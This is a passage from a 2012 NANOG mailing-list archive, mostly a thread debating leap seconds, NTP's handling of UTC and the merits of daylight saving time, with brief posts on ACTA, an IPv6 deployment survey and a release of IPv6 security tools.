third world without utilities. >>> Also, I don't think there is an acceptable level of downtime for >>> water. >> coming soon to a planet near you i work there regularly. the typical nanog kiddie does not. randy From george.herbert at gmail.com Wed Jul 4 18:14:10 2012 From: george.herbert at gmail.com (George Herbert) Date: Wed, 4 Jul 2012 16:14:10 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120704222927.GA19945@DataIX.net> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <20120704222927.GA19945@DataIX.net> Message-ID: On Jul 4, 2012, at 3:29 PM, Jason Hellenthal wrote: > Yeah but what you don't understand is that manual navigation after a > certain point of difference becomes inaccurate to a degree that is > unacceptable by most military standards. Manual navigation (sextant, etc) is dead. It's not taught for new pilots or mariners / navigators. A few hobbyists still learn that, but they can easily keep a solar-true time clock around if they wish. Maintaining any time standard for that purpose is not supported. It's no reason for the timekeepers, nothing we need to care about. The few navigation systems that look at the sun and stars have - and inherently need - better time reference than the allowed 0.9 sec before we leap. They already handle this internally. That 0.9 sec max error comes to up to about 400 meters for equitorial surface nav or 6500 for orbital objects (or suborbital - cough). Already unacceptable... George William Herbert Sent from my iPhone From rbf+nanog at panix.com Wed Jul 4 21:01:50 2012 From: rbf+nanog at panix.com (Brett Frankenberger) Date: Wed, 4 Jul 2012 21:01:50 -0500 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <123072.1341435722@turing-police.cc.vt.edu> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <123072.1341435722@turing-police.cc.vt.edu> Message-ID: <20120705020150.GA9247@panix.com> On Wed, Jul 04, 2012 at 05:02:02PM -0400, valdis.kletnieks at vt.edu wrote: > On Wed, 04 Jul 2012 12:44:40 -0500, Brett Frankenberger said: > > > Leap Seconds and Leap Years are completely unrelated and solve two > > completely different problems. > > > > Leap Seconds exist to adjust time to match the Earth's actual rotation. > > They exist because the solar day is not exactly 24 hours. > > > > Leap Years exist to adjust time to match the Earth's actual revolution > > around the Sun. They exist because the that time period isn't exactly > > 365 days. > > Actually, it's the same exact problem - an astronomical value isn't > exactly conformant to the civil value, and thus adjustments are needed. No. Leap Years arise because the solar year is not an integral multiple of the solar day. Yes, you can argue that leap years exist because the Earth doesn't revolve around the sun in 86400*365 seconds, but that missed the underlying point that since well before civil time differed from solar time, people have defined a year in terms of days, preferring not to have years starting a midnight, then dawn, then noon, then dusk, and so on. Leap years have existed since well before civil time and solar time were any different. > And you missed the bigger point - that leap seconds aren't needed because the > earth is slowing any more than leap days are needed because the year is getting > longer. If an actual siderial day was a fixed unchanging 86400.005 seconds > long, you'd still need a leap second every 200 days. *SLOWING* would be > indicated by the "every 200 days" changing to "every 175" or "every 150". I assume you meant "solar" instead of "[sidereal]" -- the sidereal day hasn't been 86400.anything seconds ever. And if the mean solar day were unchanging, then it would be 86400 civil seconds today, just like it was (by definition) in 1900. The civil second was initially defined as 1/86400 of the mean solar day in 1900 (then later redefined based on radiation from the cesium atom, but the redefinition didn't change the length of the second by enough to matter for the purposes of this discission). The only reason the mean solar day today isn't 86400 is because the Earth's rotation has slowed since 1900 and we've elected to not redefine the length of a second. Yes, technically, you're right that if the Earth's rotation rate were constant and were such that the mean solar day were 86400.005 seconds long, we'd still need leap sections. But that's a highly unlikely counterfactual hypothetical, because, again, if the Earth weren't slowing, then 1/86400-of-mean-solar-day defintion of the second would still hold. There's virtually no chance that on a hypothetical Earth that wasn't slowing, that population would have decided that the second should be 1/86400.005 of a solar day. -- Brett From valdis.kletnieks at vt.edu Wed Jul 4 21:55:24 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Wed, 04 Jul 2012 22:55:24 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Your message of "Wed, 04 Jul 2012 21:01:50 -0500." <20120705020150.GA9247@panix.com> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <123072.1341435722@turing-police.cc.vt.edu> <20120705020150.GA9247@panix.com> Message-ID: <6572.1341456924@turing-police.cc.vt.edu> On Wed, 04 Jul 2012 21:01:50 -0500, Brett Frankenberger said: > No. Leap Years arise because the solar year is not an integral > multiple of the solar day. And leap seconds arise because the astronomical day is not an integral multiple of the hour, minute, or second. Same problem. > still hold. There's virtually no chance that on a hypothetical Earth > that wasn't slowing, that population would have decided that the > second should be 1/86400.005 of a solar day. Look up the *original* definition of the meter, and think about the phrase "measurement error". -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From mysidia at gmail.com Wed Jul 4 22:39:17 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Wed, 4 Jul 2012 22:39:17 -0500 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> Message-ID: On 7/4/12, William Herrin wrote: > IMO, leap seconds are a really bad idea. Let the vanishingly few > people who care about a precision match against the solar day keep > track of the deviation from clock time and let everybody else have a > *simple* clock year after year. When the deviation increases to an > hour every what, thousand years? Then you can do a big, well > publicized correction where everybody is paying attention to making it > work instead of being caught by surprise. [snip] Instead of having leap seconds; redraw the world timezone map, so that the boundaries of every time zone are shifted by a distance in feet that corresponds to one second; and such that after a thousand years and an hour's worth of leap seconds, the physical locations of the timezones will have shifted just so far, that there is a 1 hour adjustment. :) -- -JH From owen at delong.com Wed Jul 4 22:48:58 2012 From: owen at delong.com (Owen DeLong) Date: Wed, 4 Jul 2012 20:48:58 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> Message-ID: On Jul 4, 2012, at 8:39 PM, Jimmy Hess wrote: > On 7/4/12, William Herrin wrote: > >> IMO, leap seconds are a really bad idea. Let the vanishingly few >> people who care about a precision match against the solar day keep >> track of the deviation from clock time and let everybody else have a >> *simple* clock year after year. When the deviation increases to an >> hour every what, thousand years? Then you can do a big, well >> publicized correction where everybody is paying attention to making it >> work instead of being caught by surprise. > [snip] > > Instead of having leap seconds; redraw the world timezone map, so > that the boundaries of every time zone are shifted by a distance in > feet that corresponds to one second; and such that after a thousand > years and an hour's worth of leap seconds, > the physical locations of the timezones will have shifted just so > far, that there is a 1 hour adjustment. :) > > > -- > -JH Given that we don't seem to be able to eliminate the absurdity of DST, I doubt that either of those proposals is likely to fly. Owen From patrick at ianai.net Wed Jul 4 23:24:07 2012 From: patrick at ianai.net (Patrick W. Gilmore) Date: Thu, 5 Jul 2012 00:24:07 -0400 Subject: ACTA rejected by EU Parliment Message-ID: <705E80AE-8710-4013-9A18-D95D31FD7AE1@ianai.net> This is very good news, IMHO. And operationally relevant, even to North American operators. -- TTFN, patrick From r.engehausen at gmail.com Wed Jul 4 23:47:35 2012 From: r.engehausen at gmail.com (Roy) Date: Wed, 04 Jul 2012 21:47:35 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> Message-ID: <4FF51C67.2080709@gmail.com> Rather than discussing the pros and cons of UTC and leap seconds, just create your own time system. You could call it OpenTime. OpenTime will use NTP servers where the Stratum 1 servers are synced to some time standard that doesn't care about leap seconds. That way the consumer can chose to connect his machines to UTC or OpenTime. From alter3d at alter3d.ca Thu Jul 5 00:06:31 2012 From: alter3d at alter3d.ca (Peter Kristolaitis) Date: Thu, 05 Jul 2012 01:06:31 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF51C67.2080709@gmail.com> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF51C67.2080709@gmail.com> Message-ID: <4FF520D7.5040201@alter3d.ca> On 7/5/2012 12:47 AM, Roy wrote: > Rather than discussing the pros and cons of UTC and leap seconds, just > create your own time system. > > You could call it OpenTime. OpenTime will use NTP servers where the > Stratum 1 servers are synced to some time standard that doesn't care > about leap seconds. That way the consumer can chose to connect his > machines to UTC or OpenTime. > Oblig: http://xkcd.com/927/ - Pete -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 4431 bytes Desc: S/MIME Cryptographic Signature URL: From r.engehausen at gmail.com Thu Jul 5 00:15:45 2012 From: r.engehausen at gmail.com (Roy) Date: Wed, 04 Jul 2012 22:15:45 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF520D7.5040201@alter3d.ca> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF51C67.2080709@gmail.com> <4FF520D7.5040201@alter3d.ca> Message-ID: <4FF52301.5050009@gmail.com> On 7/4/2012 10:06 PM, Peter Kristolaitis wrote: > On 7/5/2012 12:47 AM, Roy wrote: >> Rather than discussing the pros and cons of UTC and leap seconds, >> just create your own time system. >> >> You could call it OpenTime. OpenTime will use NTP servers where the >> Stratum 1 servers are synced to some time standard that doesn't care >> about leap seconds. That way the consumer can chose to connect his >> machines to UTC or OpenTime. >> > > Oblig: http://xkcd.com/927/ > > - Pete > > Right on! From joelja at bogus.com Thu Jul 5 00:25:50 2012 From: joelja at bogus.com (joel jaeggli) Date: Wed, 04 Jul 2012 22:25:50 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> Message-ID: <4FF5255E.9020208@bogus.com> On 7/4/12 8:48 PM, Owen DeLong wrote: > Given that we don't seem to be able to eliminate the absurdity of DST, > I doubt that either of those proposals is likely to fly. Owen Before we had timezones your clock offset was forward or backward 4 minutes every-time you crossed a meridian. From hrlinneweh at sbcglobal.net Thu Jul 5 02:23:11 2012 From: hrlinneweh at sbcglobal.net (Henry Linneweh) Date: Thu, 5 Jul 2012 00:23:11 -0700 (PDT) Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: Message-ID: <1341472991.9855.YahooMailNeo@web180302.mail.gq1.yahoo.com> http://www.sciencedaily.com/releases/2012/06/120629142607.htm ________________________________ From: Paul WALL To: NANOG list Sent: Saturday, June 30, 2012 6:16 PM Subject: F-ckin Leap Seconds, how do they work? Comments? Drive Slow Paul From avg at kotovnik.com Thu Jul 5 04:35:46 2012 From: avg at kotovnik.com (Vadim Antonov) Date: Thu, 05 Jul 2012 02:35:46 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> Message-ID: <1341480946.9926.3.camel@kotti.kotovnik.com> On Wed, 2012-07-04 at 20:48 -0700, Owen DeLong wrote: > > Given that we don't seem to be able to eliminate the absurdity of DST, > I doubt that either of those proposals is likely to fly. Russian govt. did eliminate DST. http://www.rt.com/news/daylight-saving-time-abolished/ --vadim From dburk at burkov.aha.ru Thu Jul 5 05:00:02 2012 From: dburk at burkov.aha.ru (Dmitry Burkov) Date: Thu, 5 Jul 2012 14:00:02 +0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <1341480946.9926.3.camel@kotti.kotovnik.com> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <1341480946.9926.3.camel@kotti.kotovnik.com> Message-ID: <9FB3317F-DB6A-4EF8-A264-4BD5EBEF1B83@burkov.aha.ru> On Jul 5, 2012, at 1:35 PM, Vadim Antonov wrote: > On Wed, 2012-07-04 at 20:48 -0700, Owen DeLong wrote: >> >> Given that we don't seem to be able to eliminate the absurdity of DST, >> I doubt that either of those proposals is likely to fly. > > Russian govt. did eliminate DST. > > http://www.rt.com/news/daylight-saving-time-abolished/ :) http://themoscownews.com/vote/20120629/189902272-results.html > > --vadim > From avg at kotovnik.com Thu Jul 5 05:09:44 2012 From: avg at kotovnik.com (Vadim Antonov) Date: Thu, 05 Jul 2012 03:09:44 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <9FB3317F-DB6A-4EF8-A264-4BD5EBEF1B83@burkov.aha.ru> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <1341480946.9926.3.camel@kotti.kotovnik.com> <9FB3317F-DB6A-4EF8-A264-4BD5EBEF1B83@burkov.aha.ru> Message-ID: <1341482984.9926.4.camel@kotti.kotovnik.com> On Thu, 2012-07-05 at 14:00 +0400, Dmitry Burkov wrote: > On Jul 5, 2012, at 1:35 PM, Vadim Antonov wrote: > > > On Wed, 2012-07-04 at 20:48 -0700, Owen DeLong wrote: > >> > >> Given that we don't seem to be able to eliminate the absurdity of DST, > >> I doubt that either of those proposals is likely to fly. > > > > Russian govt. did eliminate DST. > > > > http://www.rt.com/news/daylight-saving-time-abolished/ > > :) > http://themoscownews.com/vote/20120629/189902272-results.html 75.9% of people are dimwits :) --vadim From eugen at leitl.org Thu Jul 5 05:31:05 2012 From: eugen at leitl.org (Eugen Leitl) Date: Thu, 5 Jul 2012 12:31:05 +0200 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> Message-ID: <20120705103105.GZ12615@leitl.org> On Wed, Jul 04, 2012 at 06:10:45PM -0400, William Herrin wrote: > IMO, leap seconds are a really bad idea. Let the vanishingly few > people who care about a precision match against the solar day keep > track of the deviation from clock time and let everybody else have a > *simple* clock year after year. When the deviation increases to an > hour every what, thousand years? Then you can do a big, well > publicized correction where everybody is paying attention to making it > work instead of being caught by surprise. Notice that already InterplaNet requires a time base not linked to a particular planetary body. If we're looking at kiloyear scales, then either nobody will care about celestial dynamics of a particular planetary body, or nobody will care about precise time standards any longer. From jared at puck.nether.net Thu Jul 5 05:34:55 2012 From: jared at puck.nether.net (Jared Mauch) Date: Thu, 5 Jul 2012 06:34:55 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> Message-ID: Live further north and you will see the difference dst makes. On Jul 4, 2012, at 11:48 PM, Owen DeLong wrote: > Given that we don't seem to be able to eliminate the absurdity of DST, > I doubt that either of those proposals is likely to fly. From nick at foobar.org Thu Jul 5 06:05:54 2012 From: nick at foobar.org (Nick Hilliard) Date: Thu, 05 Jul 2012 12:05:54 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> Message-ID: <4FF57512.2090208@foobar.org> On 05/07/2012 11:34, Jared Mauch wrote: > Live further north and you will see the difference dst makes. This is true. Ireland, UK, NL, Denmark, northern Germany and northern Poland are at a similar latitude to Polar Bear Provincial Park by Hudson Bay. With DST, we get much more usable evenings March through October, and the sun rises at 05:00 instead of 04:00 in the morning, so early risers don't get woken up at 4 every day. During the winter, regular time means that we have sunrise after 08:30 for 5 weeks. At this latitude, DST is serious win. Nick From h.stener at sportradar.com Thu Jul 5 06:18:52 2012 From: h.stener at sportradar.com (Henning Stener) Date: Thu, 05 Jul 2012 13:18:52 +0200 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF57512.2090208@foobar.org> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> Message-ID: <4FF5781C.9030808@sportradar.com> On 05/07/12 13:05, Nick Hilliard wrote: > On 05/07/2012 11:34, Jared Mauch wrote: >> Live further north and you will see the difference dst makes. > > This is true. Ireland, UK, NL, Denmark, northern Germany and northern > Poland are at a similar latitude to Polar Bear Provincial Park by Hudson > Bay. With DST, we get much more usable evenings March through October, and > the sun rises at 05:00 instead of 04:00 in the morning, so early risers > don't get woken up at 4 every day. During the winter, regular time means > that we have sunrise after 08:30 for 5 weeks. At this latitude, DST is > serious win. > > Nick > > Live further north and you will see the absurdity of dst. :) I live in Norway. In summer the sun is up, in winter the sun is not up. At this latitude, dst is..meh. Henning From jared at puck.nether.net Thu Jul 5 06:25:15 2012 From: jared at puck.nether.net (Jared Mauch) Date: Thu, 5 Jul 2012 07:25:15 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF5781C.9030808@sportradar.com> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> <4FF5781C.9030808@sportradar.com> Message-ID: <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> On Jul 5, 2012, at 7:18 AM, Henning Stener wrote: > On 05/07/12 13:05, Nick Hilliard wrote: >> On 05/07/2012 11:34, Jared Mauch wrote: >>> Live further north and you will see the difference dst makes. >> >> This is true. Ireland, UK, NL, Denmark, northern Germany and northern >> Poland are at a similar latitude to Polar Bear Provincial Park by Hudson >> Bay. With DST, we get much more usable evenings March through October, and >> the sun rises at 05:00 instead of 04:00 in the morning, so early risers >> don't get woken up at 4 every day. During the winter, regular time means >> that we have sunrise after 08:30 for 5 weeks. At this latitude, DST is >> serious win. >> >> Nick >> >> > > Live further north and you will see the absurdity of dst. :) > I live in Norway. In summer the sun is up, in winter the sun is not up. > At this latitude, dst is..meh. I'm only at (aproxamately) 42.28755874876601 north. Once you go near 60 north the value changes significantly. There is a band of latitudes where it does make more sense. From rirving at antient.org Thu Jul 5 06:30:34 2012 From: rirving at antient.org (Richard Irving) Date: Thu, 05 Jul 2012 07:30:34 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> <4FF57512.2090208@foobar.org> <4FF5781C.9030808@sportradar.com> <3330A2D0-8C4A-43B1-A70B-58388DDB27EF@puck.nether.net> Message-ID: <4FF57ADA.7010504@antient.org> "I'm only at (aproxamately) 42.28755874876601 north. Once you go near 60 north the value changes significantly." "There is a band of latitudes where it does make more sense." It sure isn't Indiana. http://thinkprogress.org/climate/2010/03/13/205642/daylight-saving-time-energy-dst/?mobile=nc On 07/05/2012 07:25 AM, Jared Mauch wrote: > > On Jul 5, 2012, at 7:18 AM, Henning Stener wrote: > >> On 05/07/12 13:05, Nick Hilliard wrote: >>> On 05/07/2012 11:34, Jared Mauch wrote: >>>> Live further north and you will see the difference dst makes. >>> This is true. Ireland, UK, NL, Denmark, northern Germany and northern >>> Poland are at a similar latitude to Polar Bear Provincial Park by Hudson >>> Bay. With DST, we get much more usable evenings March through October, and >>> the sun rises at 05:00 instead of 04:00 in the morning, so early risers >>> don't get woken up at 4 every day. During the winter, regular time means >>> that we have sunrise after 08:30 for 5 weeks. At this latitude, DST is >>> serious win. >>> >>> Nick >>> >>> >> Live further north and you will see the absurdity of dst. :) >> I live in Norway. In summer the sun is up, in winter the sun is not up. >> At this latitude, dst is..meh. > I'm only at (aproxamately) 42.28755874876601 north. Once you go near 60 north the value changes significantly. > > There is a band of latitudes where it does make more sense. From jcurran at arin.net Thu Jul 5 07:00:25 2012 From: jcurran at arin.net (John Curran) Date: Thu, 5 Jul 2012 12:00:25 +0000 Subject: 2012 Global IPv6 Deployment Survey - Please take a moment to complete! Message-ID: <81AD1A9F-4C33-4D97-958F-D1623D0968CC@arin.net> NANOG Folks - IPv6 - You may love it (or hate it) but either way it would be good to take just a few moments to complete the Global IPv6 Deployment Survey (see attached). The survey is being conducted in cooperation with the Regional Internet Registries in order to better understand IPv6 deployment trends. Global IPv6 Deployment Survey: Thanks! /John John Curran President and CEO ARIN === Global IPv6 Deployment Survey Extended to 13 July 2012 Our thanks to those who have completed the 2012 IPv6 Deployment Monitoring Survey. If you have not yet participated, there is still time! The survey has been extended to Friday, 13 July. If you haven?t yet, we would appreciate if you could take a few minutes to complete the survey at: https://www.surveymonkey.com/s/GlobalIPv6survey2012 The purpose of the survey is to better understand what can be done to increase IPv6 adoption worldwide. The findings from the 2012 survey will be compared to previous years to give a perspective on progress in various regions and globally. For those interested, the results of last year's survey are available at: http://www.nro.net/wp-content/uploads/ipv6_deployment_survey.pdf. The results will be presented and discussed widely. Please provide your name and contact information on the survey form if you wish to receive the draft survey analysis when available. Please also indicate whether you are willing to share additional data with the TNO and GNKS Consult IPv6 Deployment Monitoring team. We appreciate your time and interest in completing this survey. If you have any questions concerning the survey, please send an email to: info at gnksconsult.com Regards, Communications and Member Services American Registry for Internet Numbers (ARIN From fernando at gont.com.ar Thu Jul 5 09:18:24 2012 From: fernando at gont.com.ar (Fernando Gont) Date: Thu, 05 Jul 2012 15:18:24 +0100 Subject: IPv6 security tools released Message-ID: <4FF5A230.4010908@gont.com.ar> Folks, A bunch of IPv6 security tools I produced these last couple of years have been posted online at: . Not sure whether this was really intended, but since a number of folks have already noted (off-list) that this "release" has been announced on a number of pages and twitter accounts, I thought it would be better to let you guys know about it (i.e., "the cat is out of the bag, already"). The tools compile & run on Linux and *BSD, and I'm planning to port them to Mac OS too (if only I had such a box... sigh :-) ). Any feedback will be welcome. P.S.: The slideware at: might give you some hints regarding how to use some of the tools. Thanks! Best regards, -- Fernando Gont SI6 Networks e-mail: fgont at si6networks.com PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492 From roll at Stupi.SE Thu Jul 5 16:30:58 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Thu, 5 Jul 2012 16:30:58 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4559615.12396.1341349689104.JavaMail.root@benjamin.baylink.com> Message-ID: > If you want to run a Google-patched NTP server and talk to it, you're welcome > to. The rest of us would prefer to just get it right, so we don't have to > get lied to. The timescale implementation in NTP is correct accoring to how UTC is defined. I suggest leaving it alone, chances of improving on this part over what Mills has done in half a lifetime is slim. (For those who want to state more incorrect things on this matter, let me just point out that Dave Mills received the PTTI award 2006, so NTP's implementioon of time has sufficient peer review of people who defined how UTC/TAI works.. ) The time format has a best_before date like Unix, so it will require outside information to tell what modulos of time we are in after it runs out of bits. At the IETF TICTOC BOF (a long time ago, and no_one payed attention, as we where being DOSed by the 1588 and mobile people) it was suggested to make a timescale represenation that would be future prof and work on places where time has a different rate compared to earth at sea level. -Peter From roll at Stupi.SE Thu Jul 5 16:49:48 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Thu, 5 Jul 2012 16:49:48 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Message-ID: > > On one of my BSD boxes. /usr/src/share/zoneinfo/leapseconds, I see no > > "-" > No, but they're allowed; see Figure 9 of RFC 5905: Steve, I commented that it was stated that we where doing both positive and negative corrections. Only positive corrections have been made, and yes, negative are possible. I pointed out in a previous post that we can count 57, 58, 00 or 57, 58, 59, 00 or 57, 58, 59, 60, 00. And actually, this is the only thing operating-systems and applications need to be capable to handle to make it a non_issue. > LI Leap Indicator (leap): 2-bit integer warning of an impending leap > second to be inserted or deleted in the last minute of the current > month with values defined in Figure 9. > > +-------+----------------------------------------+ > | Value | Meaning | > +-------+----------------------------------------+ > | 0 | no warning | > | 1 | last minute of the day has 61 seconds | > | 2 | last minute of the day has 59 seconds | > | 3 | unknown (clock unsynchronized) | > +-------+----------------------------------------+ That's NTP packet format, used to implemment NTP's represenation of UTC, but not the definition of UTC... (What do I do if I receive a packet with "3".) Or better, all the UTC(k) are free-running and the (old) recomenadtion was to try to keep them within 1us, is that unsyncronized -:) And ooops, I did not catch that before, should it not say "last minute of the month"? If I remember right the posix standard don't allow "60" in seconds... -Peter From roll at Stupi.SE Thu Jul 5 16:55:50 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Thu, 5 Jul 2012 16:55:50 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <85c752350c2e434f9c86242d474c4614@mail.dessus.com> Message-ID: > > Leap seconds are to align the artificial and very stable atomic timescale > > with the irregular and slowing rotation of the earth. > > You are assuming facts not in evidence. The rotation is merely irregular w= > ithin the capabilities of our scheme of measurement, calculation, and obser= > vation. Once upon a time eclipses of the sun and moon were "random magic",= > before the mechanism was understood. So to the periodic cycles of the rot= > ation of the earth about its axis, the planet about the sun, etc., are view= > ed as "magical". This is not due to magic, but rather limitations of under= > standing. Earth is 10e-8 in frequency, a nanosecond a day is kindof 10e-14 on frequency. Tom has done the work to document it.. http://www.leapsecond.com/museum/earth/ --Peter From marshall.eubanks at gmail.com Thu Jul 5 10:14:59 2012 From: marshall.eubanks at gmail.com (Marshall Eubanks) Date: Thu, 5 Jul 2012 11:14:59 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <85c752350c2e434f9c86242d474c4614@mail.dessus.com> Message-ID: On Thu, Jul 5, 2012 at 9:55 AM, Peter Lothberg wrote: >> > Leap seconds are to align the artificial and very stable atomic timescale >> > with the irregular and slowing rotation of the earth. >> >> You are assuming facts not in evidence. The rotation is merely irregular w= >> ithin the capabilities of our scheme of measurement, calculation, and obser= >> vation. Once upon a time eclipses of the sun and moon were "random magic",= >> before the mechanism was understood. So to the periodic cycles of the rot= >> ation of the earth about its axis, the planet about the sun, etc., are view= >> ed as "magical". This is not due to magic, but rather limitations of under= >> standing. > > Earth is 10e-8 in frequency, a nanosecond a day is kindof 10e-14 on > frequency. > > > Tom has done the work to document it.. > > http://www.leapsecond.com/museum/earth/ > And, by the way, the deformations and exchanges of angular momentum that drive Earth rotation variations are probably the best understood global geophysical processes there are. Absolutely no magic is required. Regards Marshall > --Peter > From smb at cs.columbia.edu Thu Jul 5 10:29:11 2012 From: smb at cs.columbia.edu (Steven Bellovin) Date: Thu, 5 Jul 2012 11:29:11 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: Message-ID: On Jul 5, 2012, at 10:49 48AM, Peter Lothberg wrote: >>> On one of my BSD boxes. /usr/src/share/zoneinfo/leapseconds, I see no >>> "-" >> No, but they're allowed; see Figure 9 of RFC 5905: > > Steve, > > I commented that it was stated that we where doing both positive and > negative corrections. Only positive corrections have been made, and > yes, negative are possible. > > I pointed out in a previous post that we can count 57, 58, 00 > or 57, 58, 59, 00 or 57, 58, 59, 60, 00. And actually, this is the > only thing operating-systems and applications need to be capable to > handle to make it a non_issue. Fair enough. > > >> LI Leap Indicator (leap): 2-bit integer warning of an impending leap >> second to be inserted or deleted in the last minute of the current >> month with values defined in Figure 9. >> >> +-------+----------------------------------------+ >> | Value | Meaning | >> +-------+----------------------------------------+ >> | 0 | no warning | >> | 1 | last minute of the day has 61 seconds | >> | 2 | last minute of the day has 59 seconds | >> | 3 | unknown (clock unsynchronized) | >> +-------+----------------------------------------+ > > That's NTP packet format, used to implemment NTP's represenation of > UTC, but not the definition of UTC... (What do I do if I receive a > packet with "3".) Or better, all the UTC(k) are free-running and the > (old) recomenadtion was to try to keep them within 1us, is that > unsyncronized -:) > > And ooops, I did not catch that before, should it not say "last minute > of the month"? The text as I copied it is certainly not consistent... > > If I remember right the posix standard don't allow "60" in seconds... > > -Peter > --Steve Bellovin, https://www.cs.columbia.edu/~smb From roll at Stupi.SE Thu Jul 5 17:34:18 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Thu, 5 Jul 2012 17:34:18 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Message-ID: Most systems that deals with time has a slightly different way of doing it than U*ix.. ref: CCIR 457-1 Like this: 56113.6294791667 56113.6301736111 56113 is MJD, modified julian date (http://tycho.usno.navy.mil/mjd.html) Want to knew the time between two observations, just subtract and you get days and fraction of day. (I's about 60sec between the lines above..) --P Ps: Tops20/Twenex/Tenex keeps the kernel time this way, in 18+18 bits... > On 7/3/12, Vadim Antonov wrote: > > There's always a possibility of using pseudo-TAI internally by > > reconstructing it from UTC. This is not the best solution (because it > > requires systems to have long-term memory of past leap seconds, or > How about, instead of requiring systems to "remember" past leap seconds; > > You represent every single timestamp instead of as > timestamp = <32-bit int, seconds since jan 1 1970 00:00:00> > > You represent all system timestamps as tuples: > timestamp = ( <32-bint int seconds since jan 1 1970 00:00:00>, > since jan 1 1970> ) > > No need to retain a history. Just retain the data in the same way > that Hours, Minutes, and Second are retained. > Comparison is simple. > > (Timestamp2 - Offset2) - (Timestamp1 - Offset1) > > > The downside is you can no longer set your system clock by hand, > because humans won't know the right number of "leap seconds" to > supply when setting the time from their wall clock. > > That's a problem necesitating you keep a history anyways. > For time to be universally coordinated, it has to be coordinated. > > One of the basic requirements for system time is that it interacts > with humans, and > humans have to be able to set their clock from conventional time > sources which are based on local time, without the machine having to > be constantly updated or reach out on a network and figure out how > that translates into a reasonable machine time. > > -- > -JH > > From roll at Stupi.SE Thu Jul 5 17:41:31 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Thu, 5 Jul 2012 17:41:31 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Message-ID: > On Tue, Jul 3, 2012 at 11:59 PM, Majdi S. Abbas wrote: > > On Tue, Jul 03, 2012 at 11:33:35PM -0400, Tyler Haske wrote: > >> 4 years. These things are supposed to be synced to a NTP source > >> anyway. > >> > >> Easiest solution is just remove leap second functionality from > >> mainline code, and make it something you have to special-compile for. > > > > Please reconcile these two statements. > > > > Thanks, > > > > --msa > > Someone running an NTP Server connected to a cesium clock could run > the leap-second time code. Since its *their job* to have the correct > time, they can do all the fancy rarely used things that make parts of > the Internet die every couple of years. A "cesium clock" don't knew it should do leap seconds unless you tell it, and it only affects the display and the internal time of the clock.. -:) The S1 NTP server and it's host OS has to be told to set the leap-second indicator by hand to.. But all the system on the internet has to knew what to do with this information. In the case of a host_os that do not knew about leap-seconds, NTP will have the correct time and then try to stear the host as fast as it can to loose/gain a second.. -P From meirea at charterschoolit.com Thu Jul 5 10:51:40 2012 From: meirea at charterschoolit.com (Mario Eirea) Date: Thu, 5 Jul 2012 15:51:40 +0000 Subject: Cisco Update Message-ID: 